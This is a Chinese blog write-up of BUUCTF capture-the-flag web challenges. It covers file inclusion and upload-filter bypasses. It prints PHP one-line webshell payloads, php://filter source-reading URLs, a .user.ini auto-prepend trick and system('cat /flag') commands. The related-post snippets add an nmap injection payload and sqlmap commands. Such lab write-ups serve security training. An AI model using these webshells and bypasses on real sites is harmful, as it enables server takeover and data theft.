BUUCTF web 文件上传+文件包含篇

最新推荐文章于 2024-08-30 14:03:29 发布
最新推荐文章于 2024-08-30 14:03:29 发布
阅读量2.6k 收藏 13
点赞数 2
文章标签: 文件上传 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55854679/article/details/119532248
版权

文章目录

[ACTF2020 新生赛]Include——文件包含

1.打开题目链接,查看题目意思为文件包含在这里插入图片描述在这里插入图片描述
2. 获取到的url为

http://c605348f-44f9-4c25-b602-66c73ee07005.node3.buuoj.cn/?file=flag.php

是一个php文件,返回字符串如下:Can you find out the flag?
猜测读取原码:构造url:

?file=php://filter/read=convert.base64-encode/resource=flag.php  //文件上传中传输PHP的协议,可以传送任意PHP文件

在这里插入图片描述
3. 猜测flag被加密,使用base64解密
在这里插入图片描述

[极客大挑战 2019]Upload——文件上传

在这里插入图片描述
由题目来看,考点为文件上传。
上传一个包含一句话木马的php文件,发现上传失败并提示不是图片。在这里插入图片描述
在上传php文件时使用burp抓包,尝试修改文件后缀为png,上传不成功在这里插入图片描述
上传图片马在这里插入图片描述

继续上传文件内容为一句话木马的jpg文件,提示过滤了<?在这里插入图片描述
因为过滤了<?,因此不能只使用php语言

<script language='php'>@eval($_POST['abc']);</script>

在这里插入图片描述
发现不仅前端,后端也进行了检查。因此使用burp抓包后添加GIF文件的文件头GIF89a,并修改文件后缀为png、phtml、gif、jpg等等均可在这里插入图片描述
使用蚁剑连接即可获得flag。在这里插入图片描述

[ACTF2020 新生赛]Upload——文件上传

打开题目链接点击灯泡即可看到隐隐约约的上传文件的框。在这里插入图片描述
上传一个含有一句话木马的php文件在这里插入图片描述
继续上传一个文件内容为一句话木马的jpg文件,发现使用蚁剑连接不成功,于是我们可以在上传jpg文件时使用burp抓包修改文件后缀为phtml在这里插入图片描述
放包后发现页面提示上传的文件的绝对路径,且文件名被修改在这里插入图片描述
使用蚁剑连接时,注意用被修改过的文件名,连接成功后即可得到flag在这里插入图片描述

[SUCTF 2019]CheckIn——文件上传

  1. 上传包含一句话木马的php文件时,提示后缀不合法;
  2. 上传图片马时,提示内容错误。
  3. 尝试htaccess绕过,当上传.htaccess文件时,提示上传文件不是图片。在这里插入图片描述
  4. 上传一个以auto_propend_file=1.gif为内容的.user.ini文件【用户自定义的配置文件】。.user.ini文件里的意思是:所有的php文件都自动包含1.gif文件,.user.ini相当于一个用户自定义的php.ini。提交后提示文件格式不是图片。在这里插入图片描述
  5. 在文件内容前面添加GIF 89a来绕过文件头检测
    在这里插入图片描述
    提示上传成功在这里插入图片描述
  6. 继续上传一个文件内容为一句话木马的1.gif文件,同时添加GIF文件头来绕过文件内容检测。
GIF 89a
<?php eval($_POST[[123];)?>

提示文件内容不合格。
7. 类似于本篇文章第二题,我们猜测过滤了<?,不能只使用php

GIF89a
<script language="php">eval($_POST['cmd']);</script>

在这里插入图片描述
在这里插入图片描述

  1. 我们发现,在uploads/d4e1477e342a41f6e43fbde8f3096ada 对应的文件夹下面有两个文件,一个是.user.ini,一个是1.gif,当然,还有一个index.php。构造URL使用蚁剑连接即可。
http://ddc85fae-66c7-4e42-91cb-6625fc35b843.node4.buuoj.cn:81/ uploads/d4e1477e342a41f6e43fbde8f3096ada/index.php
  1. 若蚁剑连接不稳定,可使用post传参得到flag。在这里插入图片描述
cmd=system('cat /flag');    //注意:cat后面有空格,不可忽略

补充知识——cat ls(linux命令)

1、ls命令

  • ls命令用于查看某个目录的内容,相当于dos系统中的dir命令。
  • Linux系统中,如果我们想把某个文件设置为隐藏文件,那么只需要在该文件的文件名前面加.即可。
  • 在终端中,.表示当前目录,而..表示上级目录,/表示根目录,~表示当前用户的目录,在home目录的下一级。

2、 cat命令

cat命令用于连接文件并打印到标准输出设备上。

poggioxay
关注
buuctf-Secret File(涉及文件包含)
m0_62094846的博客
10-27 220
打开网页后出现这样的页面,没有可以点击的地方,也没出现什么有用的信息,查看源代码 也没看到什么有用的信息,但出现了一个可以点击的代码,点击一下,进入这样的界面 又出现一个按钮,点击后却说查阅结束,要我们回去看看 查看后有个有意思的发现 源页面中的代码是action.php 但是点开后的页面却是end.php 所以可以判断两个页面之间还有一个页面,但是无论怎么输入action.php,页面都会跳转到end.php,可能是页面转的太快,试试抓包让它停下来 抓包...
BUUCTF WEB Include(文件包含
guishengyx的博客
10-18 2039
查看源码,什么都没有 点击tips 题目名称也提示了,是文件包含漏洞 百度了解到php://filter伪协议 ?file=php://filter/read=convert.base64-encode/resource=flag.php
【CTF WebBUUCTF Upload-Labs-Linux Pass-02 Writeup(文件上传+PHP+MIME绕过)
最新发布
HEX9CF的技术博客
08-30 826
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File
weixin_42566218的博客
02-21 1244
BUUCTF-Web-文件包含-[极客大挑战 2019]Secret File 题目链接:BUUCTF 类型:文件包含 知识点: 302隐式重定向、php伪协议(php://filter) 解题过程 直接看页面没啥信息,F12打开控制台发现一个超链接,因为设置了style样式和背景颜色一样所以看不出来,其实可以在页面中用ctrl+a找到这个超链接标签 跟随超链接进入到Archive_room.php页面,这里有一个SECRET链接标签,用控制台看是链接到action.php页面的 但是点
buuctf-upload
m0_62094846的博客
10-31 777
按照指示上传文件 用burp抓取 直接看到flag,我以为就这么做完了,但是交不上去,再看页面,Look here,可能还是需要木马, 但用上次的方法,改文件格式为php,就不会显示上传成功了 查找发现,也可以上传,phtml文件名 就可以得到成功的返还了 接下来按照原来的方法做,用蚁剑,最后可以在根目录下得到flag ...
Buuctf_Include【文件包含——伪类】
qq_61968245的博客
12-17 681
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 0x02
buuctf文件上传漏洞(Pass1~15)_bucctf文件上传 1,网络安全面试简历
2301_79054215的博客
04-15 322
在指定字符串中从后面开始的第一次出现的位置,如果成功,则返回从该位置到字符串结尾的所有字符,如果失败,则返回 false。file_ext,所以相当于只去除前后空格和最后的一个点,还有一个点没被去除,就能利用Windows特性(自动去除文件后的带点)2.上传 .htaccess文件,在将要上传的php文件(或其他文件)后缀修改为txt(或其他在黑名单之外的),然后上传。(mime与文件后缀名作用类似,来告诉服务器文件的性质和格式,但比后缀名更详细,浏览器一般用mine而不用后缀名)
buuctf文件上传漏洞(Pass1~15,网络安全面试题选择题
2401_83945851的博客
04-03 783
对于黑名单,先检查是否禁止.htaccess,如果被禁止,就看能不能点,空格,大小写等绕过。
BUUCTF Web1
ookami6497的博客
12-11 930
BUUCTF web(二)
m0_46616663的博客
10-21 1428
[极客大挑战 2019]Upload upload想到了文件上传漏洞,先传个一句话木马试试,php和图片马都不行 试一下phtml,phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 也不行,抓包改一下Content-Type 不让用<?,那就换一种 。。。。 再加个文件头 GIF89a OK了,猜测路径应该在/upload里面 蚁剑连上找到根目录下的flag [RoarCTF 2019]Easy Calc 源码发现 <?php error_reportin
web-文件上传【超详细讲解】
wo41ge的博客
12-01 1788
web151-前端验证 前端验证,抓包修改数据OK web152-前端+MIME 直接抓包修改后缀 web153-.user.ini 对 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样效果。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 648
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 269
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
BUUCTF学习(四): 文件包含tips
初尘屿风的博客
10-16 615
-
BUUCTF 命令执行/文件包含类型部分wp
XINO
11-24 7359
BUU差不多前两页题目中的该类型题,可能会有疏漏 [网鼎杯 2020 朱雀组]Nmap 考察nmap的利用 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 考虑到之前另一个题 payload 127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_PO
BUUCTF upload
wwwwyyyrre的博客
03-27 247
果然 用了js前端验证 关掉之后试着上传php php3 php5 phtml文件 发现phtml文件可以上传成功。这里之所以用phtml文件 是因为phtml文件可以被解析 图片马虽然有上传路径但是无法链接成功。发现不能是php文件 把文件后缀改成jpg形式 发现有后端过滤文件中不能包含<?这道题只要上传的不是jpg、png、gif结尾的图片都抓不了包 怀疑用了前端验证。上传php文件 发现不可以 并给显示 只可以上传jpg、png、gif结尾的图片。用蚁剑连接成功 在根目录找到flag。
buuctf-Include
xixihahawuwu的博客
11-23 1350
打开题目环境,就看到一个tips 点击 先回之前界面看看源码 线索这不就来了吗 … 这就是粗心的下场…浪费时间了 看下源码 源码啥都没有 突然觉得这题好熟悉的说 上题不也是给出了flag.php但是直接连接却没有内容吗,想着会不会又是php伪协议 毕竟这两道题是连在一起的(咳咳,不太明白的可以去看我的上一个博客,我可没有要你们给我增加浏览量的意思哈) 按照上题的格式试一下 ?file=php://filter/read=convert.base64-encode/resource=flag.p.
buuctf-Had a bad day(文件包含
m0_62094846的博客
11-21 886
两个按钮随便点一个 看样子有点像文件包含 ?category=php://filter/read=convert.base64-encode/resource=woofers base64解密后得到代码 但这只是说明了图片大小,没有用 应该用这个 ?category=php://filter/read=convert.base64-encode/resource=index 不能加.php,会报错 解密可以得到html代码 <html> <hea...
BUUCTF WEB Upload
qq_41696858的博客
08-30 354
这题和昨天的Upload1简直一模一样,甚至还简单点? 可以看看这一https://blog.csdn.net/qq_41696858/article/details/119986051?spm=1001.2014.3001.5501 同样的phtml过后缀过滤,同样的png过前端过滤,同样的蚁剑链接,唯一的区别是<?和图片格式过滤没做 参考视频链接:https://www.bilibili.com/video/BV1kq4y1K7wS ...
buuctf+lovesql+++sqlmap
11-29
SQLMAP是一款开源的渗透测试工具,用于检测和利用SQL注入漏洞。它可以自动化地检测和利用SQL注入漏洞,并且可以获取数据库服务器的完整权限。下面是使用SQLMAP查看数据中的列表和字段的方法: 1. 查看数据中的列表 ```python python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D mysql --tables ``` 其中,-u参数指定了目标URL,-D参数指定了要查询的数据库名称,--tables参数表示要查看该数据库中的所有表。 2. 查看列表中的字段 ```python python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns ``` 其中,-T参数指定了要查询的表名,--columns参数表示要查看该表中的所有字段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

poggioxay

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值